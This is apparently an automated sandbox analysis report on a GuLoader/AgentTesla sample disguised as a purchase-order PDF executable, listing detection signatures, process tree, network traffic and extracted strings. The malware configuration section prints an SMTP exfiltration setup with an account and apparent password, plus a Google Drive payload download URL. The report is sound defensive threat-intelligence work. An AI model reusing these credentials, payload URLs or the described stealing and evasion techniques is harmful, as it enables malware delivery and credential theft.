Play interactive tour

Edit tour

Windows Analysis Report 210629 Purchase Order 449 BURGHAUSEN (uZ 20-270)_PDF.exe

Overview

General Information

Sample Name:	210629 Purchase Order 449 BURGHAUSEN (uZ 20-270)_PDF.exe
Analysis ID:	539503
MD5:	1547238c5f89a46f4f3d448138478e05
SHA1:	b83e59cffe50f76e819731d506efd045c55aaabc
SHA256:	3e6418ff545a4ca402fd68da393fd9db7ed7e798ffed1de2fbcdbb31fa08817f
Infos:
Most interesting Screenshot:

Detection

GuLoader AgentTesla

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Yara detected AgentTesla

GuLoader behavior detected

Yara detected GuLoader

Hides threads from debuggers

Installs a global keyboard hook

Tries to steal Mail credentials (via file / registry access)

Initial sample is a PE file and has a suspicious name

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to detect Any.run

Tries to harvest and steal ftp login credentials

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Executable has a suspicious name (potential lure to open the executable)

C2 URLs / IPs found in malware configuration

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Tries to harvest and steal browser information (history, passwords, etc)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Internet Provider seen in connection with other malware

Detected potential crypto function

Found potential string decryption / allocating functions

Sample execution stops while process was sleeping (likely an evasion)

Yara detected Credential Stealer

JA3 SSL client fingerprint seen in connection with other malware

Creates processes with suspicious names

IP address seen in connection with other malware

Contains long sleeps (>= 3 min)

Abnormal high CPU Usage

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Sample file is different than original file name gathered from version info

PE file contains strange resources

Tries to load missing DLLs

Uses a known web browser user agent for HTTP communication

Detected TCP or UDP traffic on non-standard ports

Checks if the current process is being debugged

Uses SMTP (mail sending)

Creates a window with clipboard capturing capabilities

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Uses Microsoft's Enhanced Cryptographic Provider

Creates a process in suspended mode (likely to inject code)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

System is w10x64native

210629 Purchase Order 449 BURGHAUSEN (uZ 20-270)_PDF.exe (PID: 8152 cmdline: "C:\Users\user\Desktop\210629 Purchase Order 449 BURGHAUSEN (uZ 20-270)_PDF.exe" MD5: 1547238C5F89A46F4F3D448138478E05)

CasPol.exe (PID: 6116 cmdline: "C:\Users\user\Desktop\210629 Purchase Order 449 BURGHAUSEN (uZ 20-270)_PDF.exe" MD5: 914F728C04D3EDDD5FBA59420E74E56B)

CasPol.exe (PID: 2268 cmdline: "C:\Users\user\Desktop\210629 Purchase Order 449 BURGHAUSEN (uZ 20-270)_PDF.exe" MD5: 914F728C04D3EDDD5FBA59420E74E56B)

conhost.exe (PID: 6208 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

cleanup

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "SMTP Info": "paco@fortunametals.esFortunaPaco#2018mail.fortunametals.eskingpentecost22@gmail.com"}

Threatname: GuLoader

{"Payload URL": "https://drive.google.com/uc?export=download&id=1sW9p"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author
0000000A.00000000.101282349186.0000000000A00000.00000040.00000001.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
0000000A.00000002.105886078369.000000001DB80000.00000004.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000002.00000002.101469724923.0000000002D80000.00000040.00000001.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
0000000A.00000002.105885711139.000000001DB31000.00000004.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000000A.00000002.105885711139.000000001DB31000.00000004.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: CasPol.exe PID: 2268	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: CasPol.exe PID: 2268	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Click to see the 2 entries

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 0000000A.00000000.101282349186.0000000000A00000.00000040.00000001.sdmp	Malware Configuration Extractor: GuLoader {"Payload URL": "https://drive.google.com/uc?export=download&id=1sW9p"}
Source: CasPol.exe.6116.9.memstrmin	Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "SMTP Info": "paco@fortunametals.esFortunaPaco#2018mail.fortunametals.eskingpentecost22@gmail.com"}

Multi AV Scanner detection for submitted file

Show sources

Source: 210629 Purchase Order 449 BURGHAUSEN (uZ 20-270)_PDF.exe	Virustotal: Detection: 33%			Perma Link
Source: 210629 Purchase Order 449 BURGHAUSEN (uZ 20-270)_PDF.exe	ReversingLabs: Detection: 15%

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 10_2_00E7B988 CryptUnprotectData,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 10_2_00E7B981 CryptUnprotectData,

Source: 210629 Purchase Order 449 BURGHAUSEN (uZ 20-270)_PDF.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: unknown	HTTPS traffic detected: 142.250.185.238:443 -> 192.168.11.20:49814 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.185.161:443 -> 192.168.11.20:49815 version: TLS 1.2

Networking:

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: https://drive.google.com/uc?export=download&id=1sW9p

Source: Joe Sandbox View

ASN Name: OVHFR OVHFR

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: Joe Sandbox View

IP Address: 94.23.221.28 94.23.221.28

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1sW9pADfhXH64ij3XW0uAfaPSES7O-x1G HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/b7qfcdp6et0sg0enesn34rrf8kvhhdrn/1639482750000/03916840094075221792/*/1sW9pADfhXH64ij3XW0uAfaPSES7O-x1G?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-14-38-docs.googleusercontent.comConnection: Keep-Alive

Source: global traffic

TCP traffic: 192.168.11.20:49823 -> 94.23.221.28:587

Source: global traffic

TCP traffic: 192.168.11.20:49823 -> 94.23.221.28:587

Source: unknown	Network traffic detected: HTTP traffic on port 49814 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49815 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49815
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49814

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: CasPol.exe, 0000000A.00000002.105886078369.000000001DB80000.00000004.00000001.sdmp	String found in binary or memory: subdomain_match":["go","tv"]},{"applied_policy":"EdgeUA","domain":"video.zhihu.com"},{"applied_policy":"ChromeUA","domain":"la7.it"},{"applied_policy":"ChromeUA","domain":"ide.cs50.io"},{"applied_policy":"ChromeUA","domain":"moneygram.com"},{"applied_policy":"ChromeUA","domain":"blog.esuteru.com"},{"applied_policy":"ChromeUA","domain":"online.tivo.com","path_match":["/start"]},{"applied_policy":"ChromeUA","domain":"smallbusiness.yahoo.com","path_match":["/businessmaker"]},{"applied_policy":"ChromeUA","domain":"jeeready.amazon.in","path_match":["/home"]},{"applied_policy":"ChromeUA","domain":"abc.com"},{"applied_policy":"ChromeUA","domain":"mvsrec738.examly.io"},{"applied_policy":"ChromeUA","domain":"myslate.sixphrase.com"},{"applied_policy":"ChromeUA","domain":"search.norton.com","path_match":["/nsssOnboarding"]},{"applied_policy":"ChromeUA","domain":"checkdecide.com"},{"applied_policy":"ChromeUA","domain":"virtualvisitlogin.partners.org"},{"applied_policy":"ChromeUA","domain":"carelogin.bryantelemedicine.com"},{"applied_policy":"ChromeUA","domain":"providerstc.hs.utah.gov"},{"applied_policy":"ChromeUA","domain":"applychildcaresubsidy.alberta.ca"},{"applied_policy":"ChromeUA","domain":"elearning.evn.com.vn","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"telecare.keckmedicine.org"},{"applied_policy":"ChromeUA","domain":"authoring.amirsys.com","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"elearning.seabank.com.vn","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"app.fields.corteva.com","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"gsq.minornet.com"},{"applied_policy":"ChromeUA","domain":"shop.lic.co.nz"},{"applied_policy":"ChromeUA","domain":"telehealthportal.uofuhealth.org"},{"applied_policy":"ChromeUA","domain":"portal.centurylink.com"},{"applied_policy":"ChromeUA","domain":"visitnow.org"},{"applied_policy":"ChromeUA","domain":"www.hotstar.com","path_match":["/in/subscribe/payment/methods/dc","/in/subscribe/payment/methods/cc"]},{"applied_policy":"ChromeUA","domain":"tryca.st","path_match":["/studio","/publisher"]},{"applied_policy":"ChromeUA","domain":"telemost.yandex.ru"},{"applied_policy":"ChromeUA","domain":"astrogo.astro.com.my"},{"applied_policy":"ChromeUA","domain":"airbornemedia.gogoinflight.com"},{"applied_policy":"ChromeUA","domain":"itoaxaca.mindbox.app"},{"applied_policy":"ChromeUA","domain":"app.classkick.com"},{"applied_policy":"ChromeUA","domain":"exchangeservicecenter.com","path_match":["/freeze"]},{"applied_policy":"ChromeUA","domain":"bancodeoccidente.com.co","path_match":["/portaltransaccional"]},{"applied_policy":"ChromeUA","domain":"better.com"},{"applied_policy":"IEUA","domain":"bm.gzekao.cn","path_match":["/tr/webregister/"]},{"applied_policy":"ChromeUA","domain":"scheduling.care.psjhealth.org","path_match":["/virtual"]},{"applied_policy":"ChromeUA","domain":"salud.go.cr"},{"applied_policy":"ChromeUA","domain":"learning.chungdahm.com"},{"applied_policy":"C
Source: Cookies.10.dr	String found in binary or memory: .www.linkedin.combscookie/ equals www.linkedin.com (Linkedin)
Source: CasPol.exe, 0000000A.00000002.105887500198.000000001DC9B000.00000004.00000001.sdmp, Cookies.10.dr	String found in binary or memory: .www.linkedin.combscookie/+= equals www.linkedin.com (Linkedin)
Source: Cookies.10.dr	String found in binary or memory: .www.linkedin.combscookie//a equals www.linkedin.com (Linkedin)

Source: CasPol.exe, 0000000A.00000002.105885711139.000000001DB31000.00000004.00000001.sdmp	String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: CasPol.exe, 0000000A.00000002.105885711139.000000001DB31000.00000004.00000001.sdmp	String found in binary or memory: http://DynDns.comDynDNS
Source: CasPol.exe, 0000000A.00000002.105885711139.000000001DB31000.00000004.00000001.sdmp	String found in binary or memory: http://FZUXPX.com
Source: CasPol.exe, 0000000A.00000002.105887665137.000000001DCB6000.00000004.00000001.sdmp, CasPol.exe, 0000000A.00000003.102417303454.000000001FD96000.00000004.00000001.sdmp, CasPol.exe, 0000000A.00000002.105874544943.0000000000B7B000.00000004.00000020.sdmp, CasPol.exe, 0000000A.00000002.105887107468.000000001DC58000.00000004.00000001.sdmp, CasPol.exe, 0000000A.00000003.102418225133.000000001FDA3000.00000004.00000001.sdmp, CasPol.exe, 0000000A.00000002.105892534113.000000001FD7F000.00000004.00000001.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: CasPol.exe, 0000000A.00000003.101439211072.0000000000C15000.00000004.00000001.sdmp, CasPol.exe, 0000000A.00000002.105875396788.0000000000C17000.00000004.00000020.sdmp, CasPol.exe, 0000000A.00000003.101443688665.0000000000C15000.00000004.00000001.sdmp, CasPol.exe, 0000000A.00000003.101438628590.0000000000C15000.00000004.00000001.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: CasPol.exe, 0000000A.00000002.105887665137.000000001DCB6000.00000004.00000001.sdmp, CasPol.exe, 0000000A.00000003.102417303454.000000001FD96000.00000004.00000001.sdmp, CasPol.exe, 0000000A.00000002.105874843683.0000000000BBA000.00000004.00000020.sdmp, CasPol.exe, 0000000A.00000002.105887107468.000000001DC58000.00000004.00000001.sdmp, CasPol.exe, 0000000A.00000003.102418225133.000000001FDA3000.00000004.00000001.sdmp, CasPol.exe, 0000000A.00000002.105892534113.000000001FD7F000.00000004.00000001.sdmp	String found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
Source: CasPol.exe, 0000000A.00000002.105887665137.000000001DCB6000.00000004.00000001.sdmp, CasPol.exe, 0000000A.00000003.102417303454.000000001FD96000.00000004.00000001.sdmp, CasPol.exe, 0000000A.00000002.105874544943.0000000000B7B000.00000004.00000020.sdmp, CasPol.exe, 0000000A.00000002.105887107468.000000001DC58000.00000004.00000001.sdmp, CasPol.exe, 0000000A.00000003.102418225133.000000001FDA3000.00000004.00000001.sdmp, CasPol.exe, 0000000A.00000002.105892534113.000000001FD7F000.00000004.00000001.sdmp	String found in binary or memory: http://crl.comodoca.com/cPanelIncCertificationAuthority.crl0
Source: CasPol.exe, 0000000A.00000003.101439211072.0000000000C15000.00000004.00000001.sdmp, CasPol.exe, 0000000A.00000002.105875396788.0000000000C17000.00000004.00000020.sdmp, CasPol.exe, 0000000A.00000003.101443688665.0000000000C15000.00000004.00000001.sdmp, CasPol.exe, 0000000A.00000003.101438628590.0000000000C15000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: CasPol.exe, 0000000A.00000002.105887107468.000000001DC58000.00000004.00000001.sdmp	String found in binary or memory: http://fortunametals.es
Source: CasPol.exe, 0000000A.00000002.105887107468.000000001DC58000.00000004.00000001.sdmp	String found in binary or memory: http://mail.fortunametals.es
Source: CasPol.exe, 0000000A.00000002.105887665137.000000001DCB6000.00000004.00000001.sdmp, CasPol.exe, 0000000A.00000003.102417303454.000000001FD96000.00000004.00000001.sdmp, CasPol.exe, 0000000A.00000002.105874843683.0000000000BBA000.00000004.00000020.sdmp, CasPol.exe, 0000000A.00000002.105874544943.0000000000B7B000.00000004.00000020.sdmp, CasPol.exe, 0000000A.00000002.105887107468.000000001DC58000.00000004.00000001.sdmp, CasPol.exe, 0000000A.00000003.102418225133.000000001FDA3000.00000004.00000001.sdmp, CasPol.exe, 0000000A.00000002.105892534113.000000001FD7F000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: CasPol.exe, 0000000A.00000002.105886891663.000000001DC34000.00000004.00000001.sdmp, CasPol.exe, 0000000A.00000002.105887303934.000000001DC7C000.00000004.00000001.sdmp, CasPol.exe, 0000000A.00000003.102379089042.000000001CA81000.00000004.00000001.sdmp, CasPol.exe, 0000000A.00000002.105887059814.000000001DC52000.00000004.00000001.sdmp, CasPol.exe, 0000000A.00000002.105887359393.000000001DC85000.00000004.00000001.sdmp, CasPol.exe, 0000000A.00000002.105887021682.000000001DC4E000.00000004.00000001.sdmp	String found in binary or memory: https://XCD4GuOxIDpaEsq6zLmj.org
Source: CasPol.exe, 0000000A.00000002.105886891663.000000001DC34000.00000004.00000001.sdmp	String found in binary or memory: https://XCD4GuOxIDpaEsq6zLmj.orgt-
Source: CasPol.exe, 0000000A.00000002.105885711139.000000001DB31000.00000004.00000001.sdmp	String found in binary or memory: https://api.ipify.org%4
Source: CasPol.exe, 0000000A.00000002.105885711139.000000001DB31000.00000004.00000001.sdmp	String found in binary or memory: https://api.ipify.org%GETMozilla/5.0
Source: CasPol.exe, 0000000A.00000003.101439211072.0000000000C15000.00000004.00000001.sdmp, CasPol.exe, 0000000A.00000003.101438628590.0000000000C15000.00000004.00000001.sdmp	String found in binary or memory: https://csp.withgoogle.com/csp/drive-explorer/
Source: CasPol.exe, 0000000A.00000003.101439211072.0000000000C15000.00000004.00000001.sdmp, CasPol.exe, 0000000A.00000003.101438628590.0000000000C15000.00000004.00000001.sdmp	String found in binary or memory: https://csp.withgoogle.com/csp/report-to/gse_l9ocaq
Source: CasPol.exe, 0000000A.00000002.105874843683.0000000000BBA000.00000004.00000020.sdmp, CasPol.exe, 0000000A.00000003.101439211072.0000000000C15000.00000004.00000001.sdmp, CasPol.exe, 0000000A.00000003.101443688665.0000000000C15000.00000004.00000001.sdmp	String found in binary or memory: https://doc-14-38-docs.googleusercontent.com/
Source: CasPol.exe, 0000000A.00000002.105874843683.0000000000BBA000.00000004.00000020.sdmp	String found in binary or memory: https://doc-14-38-docs.googleusercontent.com/C
Source: CasPol.exe, 0000000A.00000003.101439211072.0000000000C15000.00000004.00000001.sdmp, CasPol.exe, 0000000A.00000003.101443688665.0000000000C15000.00000004.00000001.sdmp	String found in binary or memory: https://doc-14-38-docs.googleusercontent.com/K
Source: CasPol.exe, 0000000A.00000003.101438628590.0000000000C15000.00000004.00000001.sdmp	String found in binary or memory: https://doc-14-38-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/b7qfcdp6
Source: CasPol.exe, 0000000A.00000002.105874544943.0000000000B7B000.00000004.00000020.sdmp	String found in binary or memory: https://drive.google.com/
Source: CasPol.exe, 0000000A.00000002.105874544943.0000000000B7B000.00000004.00000020.sdmp	String found in binary or memory: https://drive.google.com/X
Source: CasPol.exe, 0000000A.00000002.105876042787.0000000000DC0000.00000004.00000001.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1sW9pADfhXH64ij3XW0uAfaPSES7O-x1G
Source: CasPol.exe, 0000000A.00000003.101439211072.0000000000C15000.00000004.00000001.sdmp, CasPol.exe, 0000000A.00000003.101443688665.0000000000C15000.00000004.00000001.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1sW9pADfhXH64ij3XW0uAfaPSES7O-x1G0
Source: CasPol.exe, 0000000A.00000002.105874843683.0000000000BBA000.00000004.00000020.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1sW9pADfhXH64ij3XW0uAfaPSES7O-x1Ga
Source: CasPol.exe, 0000000A.00000002.105874843683.0000000000BBA000.00000004.00000020.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1sW9pADfhXH64ij3XW0uAfaPSES7O-x1Gg
Source: CasPol.exe, 0000000A.00000002.105886078369.000000001DB80000.00000004.00000001.sdmp, CasPol.exe, 0000000A.00000002.105886584690.000000001DBEE000.00000004.00000001.sdmp	String found in binary or memory: https://login.live.com/
Source: CasPol.exe, 0000000A.00000002.105886078369.000000001DB80000.00000004.00000001.sdmp	String found in binary or memory: https://login.live.com//
Source: CasPol.exe, 0000000A.00000002.105886584690.000000001DBEE000.00000004.00000001.sdmp	String found in binary or memory: https://login.live.com/8_
Source: CasPol.exe, 0000000A.00000002.105886078369.000000001DB80000.00000004.00000001.sdmp	String found in binary or memory: https://login.live.com/https://login.live.com/
Source: CasPol.exe, 0000000A.00000002.105886078369.000000001DB80000.00000004.00000001.sdmp	String found in binary or memory: https://login.live.com/v104
Source: CasPol.exe, 0000000A.00000002.105887665137.000000001DCB6000.00000004.00000001.sdmp, CasPol.exe, 0000000A.00000003.102417303454.000000001FD96000.00000004.00000001.sdmp, CasPol.exe, 0000000A.00000002.105874544943.0000000000B7B000.00000004.00000020.sdmp, CasPol.exe, 0000000A.00000002.105887107468.000000001DC58000.00000004.00000001.sdmp, CasPol.exe, 0000000A.00000003.102418225133.000000001FDA3000.00000004.00000001.sdmp, CasPol.exe, 0000000A.00000002.105892534113.000000001FD7F000.00000004.00000001.sdmp	String found in binary or memory: https://sectigo.com/CPS0
Source: CasPol.exe, 0000000A.00000002.105886584690.000000001DBEE000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
Source: CasPol.exe, 0000000A.00000002.105885711139.000000001DB31000.00000004.00000001.sdmp	String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha

Source: unknown

DNS traffic detected: queries for: drive.google.com

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1sW9pADfhXH64ij3XW0uAfaPSES7O-x1G HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/b7qfcdp6et0sg0enesn34rrf8kvhhdrn/1639482750000/03916840094075221792/*/1sW9pADfhXH64ij3XW0uAfaPSES7O-x1G?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-14-38-docs.googleusercontent.comConnection: Keep-Alive

Source: unknown	HTTPS traffic detected: 142.250.185.238:443 -> 192.168.11.20:49814 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.185.161:443 -> 192.168.11.20:49815 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Installs a global keyboard hook

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Windows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Window created: window name: CLIPBRDWNDCLASS

System Summary:

Initial sample is a PE file and has a suspicious name

Show sources

Source: initial sample	Static PE information: Filename: 210629 Purchase Order 449 BURGHAUSEN (uZ 20-270)_PDF.exe
Source: initial sample	Static PE information: Filename: 210629 Purchase Order 449 BURGHAUSEN (uZ 20-270)_PDF.exe

Executable has a suspicious name (potential lure to open the executable)

Show sources

Source: 210629 Purchase Order 449 BURGHAUSEN (uZ 20-270)_PDF.exe

Static file information: Suspicious name

Source: 210629 Purchase Order 449 BURGHAUSEN (uZ 20-270)_PDF.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 10_2_00713A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 10_2_0071EAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 10_2_00714320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 10_2_00713708
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 10_2_00A0D9C5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 10_2_00E6F928
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 10_2_00E6CA59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 10_2_00E6A3C9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 10_2_00E6A017
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 10_2_00E6F923
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 10_2_00E64748
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 10_2_00E73898
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 10_2_00E71958
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 10_2_00E73558
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 10_2_00E78320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 10_2_00E7D1E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 10_2_00E78A60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 10_2_00E78B60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 10_2_1D9B5E08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 10_2_1D9B4FF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 10_2_1D9B46C4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 10_2_1D9B5D41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 10_2_1D9B6AF1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 10_2_1FF5BA90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 10_2_1FF5D9B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 10_2_1FF54AC8

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: String function: 00718C40 appears 52 times

Source: C:\Users\user\Desktop\210629 Purchase Order 449 BURGHAUSEN (uZ 20-270)_PDF.exe

Process Stats: CPU usage > 98%

Source: 210629 Purchase Order 449 BURGHAUSEN (uZ 20-270)_PDF.exe, 00000002.00000000.100832030618.000000000042B000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameLydbl.exe vs 210629 Purchase Order 449 BURGHAUSEN (uZ 20-270)_PDF.exe
Source: 210629 Purchase Order 449 BURGHAUSEN (uZ 20-270)_PDF.exe, 00000002.00000002.101468206802.0000000002AB0000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameLydbl.exeFE2X vs 210629 Purchase Order 449 BURGHAUSEN (uZ 20-270)_PDF.exe
Source: 210629 Purchase Order 449 BURGHAUSEN (uZ 20-270)_PDF.exe	Binary or memory string: OriginalFilenameLydbl.exe vs 210629 Purchase Order 449 BURGHAUSEN (uZ 20-270)_PDF.exe

Source: 210629 Purchase Order 449 BURGHAUSEN (uZ 20-270)_PDF.exe

Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: C:\Users\user\Desktop\210629 Purchase Order 449 BURGHAUSEN (uZ 20-270)_PDF.exe	Section loaded: edgegdi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: edgegdi.dll

Source: 210629 Purchase Order 449 BURGHAUSEN (uZ 20-270)_PDF.exe	Virustotal: Detection: 33%
Source: 210629 Purchase Order 449 BURGHAUSEN (uZ 20-270)_PDF.exe	ReversingLabs: Detection: 15%

Source: 210629 Purchase Order 449 BURGHAUSEN (uZ 20-270)_PDF.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\210629 Purchase Order 449 BURGHAUSEN (uZ 20-270)_PDF.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: C:\Users\user\Desktop\210629 Purchase Order 449 BURGHAUSEN (uZ 20-270)_PDF.exe

Section loaded: C:\Windows\SysWOW64\msvbvm60.dll

Source: unknown	Process created: C:\Users\user\Desktop\210629 Purchase Order 449 BURGHAUSEN (uZ 20-270)_PDF.exe "C:\Users\user\Desktop\210629 Purchase Order 449 BURGHAUSEN (uZ 20-270)_PDF.exe"
Source: C:\Users\user\Desktop\210629 Purchase Order 449 BURGHAUSEN (uZ 20-270)_PDF.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\210629 Purchase Order 449 BURGHAUSEN (uZ 20-270)_PDF.exe"
Source: C:\Users\user\Desktop\210629 Purchase Order 449 BURGHAUSEN (uZ 20-270)_PDF.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\210629 Purchase Order 449 BURGHAUSEN (uZ 20-270)_PDF.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\210629 Purchase Order 449 BURGHAUSEN (uZ 20-270)_PDF.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\210629 Purchase Order 449 BURGHAUSEN (uZ 20-270)_PDF.exe"
Source: C:\Users\user\Desktop\210629 Purchase Order 449 BURGHAUSEN (uZ 20-270)_PDF.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\210629 Purchase Order 449 BURGHAUSEN (uZ 20-270)_PDF.exe"

Source: C:\Users\user\Desktop\210629 Purchase Order 449 BURGHAUSEN (uZ 20-270)_PDF.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0D43FE01-F093-11CF-8940-00A0C9054228}\InprocServer32

